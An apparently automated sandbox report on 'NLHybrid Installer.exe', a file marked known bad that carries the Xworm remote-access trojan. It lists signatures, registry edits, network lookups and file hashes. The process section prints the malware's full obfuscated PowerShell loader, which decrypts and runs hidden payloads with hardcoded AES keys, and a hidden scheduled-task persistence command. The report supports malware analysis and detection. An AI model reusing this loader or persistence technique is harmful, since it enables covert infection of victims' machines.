Analysis Overview
SHA256
c5fc6ccc1b183c14888a0a832a52ea7ee37efa0e84f6712aae56101c48da983e
Threat Level: Known bad
The file NLHybrid Installer.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Xworm family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Checks installed software on the system
System Location Discovery: System Language Discovery
Program crash
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 05:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 05:34
Reported
2024-11-13 05:39
Platform
win10ltsc2021-20241023-en
Max time kernel
238s
Max time network
226s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\XClient.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NLHybrid Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\NLHybrid Fixer\\NLHybrid Fixer.bat\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Applications\NLHybrid Fixer.bat | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\.myp | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\NLHybrid Fixer\\NLHybrid Fixer.bat,0" | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\shell | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\shell\open | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Applications\NLHybrid Fixer.bat\SupportedTypes | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\ = "NLHybrid Fixer File" | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\.myp\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Applications\NLHybrid Fixer.bat\SupportedTypes\.myp | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Applications | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\.myp\OpenWithProgids\NLHybridFixerFile.myp | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\NLHybridFixerFile.myp\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NLHybrid Installer.exe
"C:\Users\Admin\AppData\Local\Temp\NLHybrid Installer.exe"
C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp" /SL5="$501BE,1111535,845824,C:\Users\Admin\AppData\Local\Temp\NLHybrid Installer.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\NLHybrid Fixer.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxaOcu592pxjx2riZwLLzxifbSL4LVKOvKdWGmoFwo8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KCSLz1jpgN1BDTd1TxKBLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uCgKb=New-Object System.IO.MemoryStream(,$param_var); $hRDfQ=New-Object System.IO.MemoryStream; $hqAUw=New-Object System.IO.Compression.GZipStream($uCgKb, [IO.Compression.CompressionMode]::Decompress); $hqAUw.CopyTo($hRDfQ); $hqAUw.Dispose(); $uCgKb.Dispose(); $hRDfQ.Dispose(); $hRDfQ.ToArray();}function execute_function($param_var,$param2_var){ $btbYa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oUuFp=$btbYa.EntryPoint; $oUuFp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\NLHybrid Fixer.bat';$rzvJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($zlWxg in $rzvJC) { if ($zlWxg.StartsWith(':: ')) { $guGBs=$zlWxg.Substring(3); break; }}$payloads_var=[string[]]$guGBs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_364_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_364.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_364.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_364.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxaOcu592pxjx2riZwLLzxifbSL4LVKOvKdWGmoFwo8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KCSLz1jpgN1BDTd1TxKBLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uCgKb=New-Object System.IO.MemoryStream(,$param_var); $hRDfQ=New-Object System.IO.MemoryStream; $hqAUw=New-Object System.IO.Compression.GZipStream($uCgKb, [IO.Compression.CompressionMode]::Decompress); $hqAUw.CopyTo($hRDfQ); $hqAUw.Dispose(); $uCgKb.Dispose(); $hRDfQ.Dispose(); $hRDfQ.ToArray();}function execute_function($param_var,$param2_var){ $btbYa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oUuFp=$btbYa.EntryPoint; $oUuFp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_364.bat';$rzvJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_364.bat').Split([Environment]::NewLine);foreach ($zlWxg in $rzvJC) { if ($zlWxg.StartsWith(':: ')) { $guGBs=$zlWxg.Substring(3); break; }}$payloads_var=[string[]]$guGBs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\XClient.exe
"C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\XClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2020 -ip 2020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 3260
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.11.108.188:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4996-0-0x00000000009C0000-0x0000000000A9C000-memory.dmp
memory/4996-2-0x00000000009C1000-0x0000000000A69000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-D8UAL.tmp\NLHybrid Installer.tmp
| MD5 | c31db43de7031d003d528c81517a3958 |
| SHA1 | 05d86b48e6873d561e484c134c2e99d6df7215ed |
| SHA256 | 0d4ee23a50876177908a4f2cd1a4aa4e68e700b059be3c535cd22ca6c5132f82 |
| SHA512 | dab6939cd0437ded9609d031a618dcb9c92a46b21ac2f97d1c196c852d983f4f1ea54caebb0ca8f09813f7ef9da03d25b502a2429f20300932f57a2923c3135a |
memory/2372-6-0x00000000015B0000-0x00000000015B1000-memory.dmp
C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\NLHybrid Fixer.bat
| MD5 | 05752d236dc924a1e10ba6e6081b5302 |
| SHA1 | 8a85b3864b64ff001b10ab957ddef96caa05fbc7 |
| SHA256 | f280c213d2bb0de32863411882ef3ebde4db0905850e09ad921563369d9e1d66 |
| SHA512 | 81991e5aa0ebd2a54f33622f1be283b96e0343c78cb15f1595db1418dd28d2a3435120ee268b8bb7bca26592a9bfaa3bd514c8dd3d6a793eaf6979b86ac631f0 |
memory/2372-22-0x00000000005D0000-0x0000000000913000-memory.dmp
memory/4996-24-0x00000000009C0000-0x0000000000A9C000-memory.dmp
memory/4816-25-0x00000000745FE000-0x00000000745FF000-memory.dmp
memory/4816-26-0x00000000048F0000-0x0000000004926000-memory.dmp
memory/4816-27-0x00000000745F0000-0x0000000074DA1000-memory.dmp
memory/4816-28-0x0000000005160000-0x000000000582A000-memory.dmp
memory/4816-29-0x0000000005100000-0x0000000005122000-memory.dmp
memory/4816-31-0x0000000005980000-0x00000000059E6000-memory.dmp
memory/4816-30-0x00000000058A0000-0x0000000005906000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40vm5a0g.205.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4816-41-0x00000000059F0000-0x0000000005D47000-memory.dmp
memory/4816-42-0x0000000005E80000-0x0000000005E9E000-memory.dmp
memory/4816-43-0x0000000005EF0000-0x0000000005F3C000-memory.dmp
memory/4816-44-0x0000000007690000-0x0000000007D0A000-memory.dmp
memory/4816-45-0x0000000007010000-0x000000000702A000-memory.dmp
memory/4816-46-0x0000000006FF0000-0x0000000006FF8000-memory.dmp
memory/4816-47-0x00000000070B0000-0x0000000007114000-memory.dmp
memory/4816-48-0x00000000082C0000-0x0000000008866000-memory.dmp
memory/1864-59-0x0000000007B90000-0x0000000007BC2000-memory.dmp
memory/1864-60-0x00000000707D0000-0x000000007081C000-memory.dmp
memory/1864-70-0x0000000007B70000-0x0000000007B8E000-memory.dmp
memory/1864-71-0x0000000007BE0000-0x0000000007C83000-memory.dmp
memory/1864-72-0x0000000007DB0000-0x0000000007DBA000-memory.dmp
memory/1864-73-0x0000000007FC0000-0x0000000008056000-memory.dmp
memory/1864-74-0x0000000007F30000-0x0000000007F41000-memory.dmp
C:\Users\Admin\AppData\Roaming\startup_str_364.vbs
| MD5 | 42e20023a6b5fcd7b29deb54bb7d9cb2 |
| SHA1 | c685ae6ec1e89d6d6140ad318d021db26371aacc |
| SHA256 | ada99ddef60c7436e68333682dfeaa9f3be24ce9374b2065e1984c939cb6e2e8 |
| SHA512 | d3174b74d8b3a2d76f4a5c8f7d07cb1c58c81ff9bcb0f5909019fa32f1684a9add508c8292bdb142becd07b207e307d1fbfbc9cb42288da1fd18e6a2ebe1e0d7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d35a6072a526f4be648737d44942ec9b |
| SHA1 | c98b1b843ab9608b5086767a73345b99d6449965 |
| SHA256 | bbfb3cac32cda60bc0146605c57995bf1be4053405fe55d38e4ed7269705e416 |
| SHA512 | f59bafe6ae9f54d3e1b7593363fc30e9ceff9896f52d9ff1cebaf1f4727b1a946e20605fc1112e8342bbb741c098f8869b74ac3012fd9ceffe9deda25736b9cd |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | f8634c179c1a738e20815ec466527e78 |
| SHA1 | 5ff99194f001b39289485a6c6fa0ba8b5f50aa42 |
| SHA256 | b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4 |
| SHA512 | 806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f |
memory/4816-86-0x00000000745FE000-0x00000000745FF000-memory.dmp
memory/4816-87-0x00000000745F0000-0x0000000074DA1000-memory.dmp
memory/4816-98-0x00000000745F0000-0x0000000074DA1000-memory.dmp
memory/4816-99-0x00000000745F0000-0x0000000074DA1000-memory.dmp
memory/2020-102-0x0000000007AC0000-0x0000000007AEE000-memory.dmp
memory/2020-103-0x0000000007CA0000-0x0000000007D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Programs\NLHybrid Fixer\XClient.exe
| MD5 | 4dd0f50e72bfa4da180d9280c7dcc00d |
| SHA1 | a771d2dc5aa65038fbf2053d3e7bb664bda8e1c7 |
| SHA256 | 653659129b2cec88dd5678b486edbcce42e15406090eda1384f8481a550b332c |
| SHA512 | 8c6475d893c58687e7d06883b32501a0f555ce64df790df323105bb96b2a7841cab34c6cfda0f02985d1aa440d1bcc13b3552fe7d02b057ccabef982b1fd85ad |
memory/664-117-0x0000000000440000-0x000000000046E000-memory.dmp
memory/4920-121-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-120-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-119-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-131-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-130-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-129-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-128-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-127-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-126-0x000001ABC8470000-0x000001ABC8471000-memory.dmp
memory/4920-125-0x000001ABC8470000-0x000001ABC8471000-memory.dmp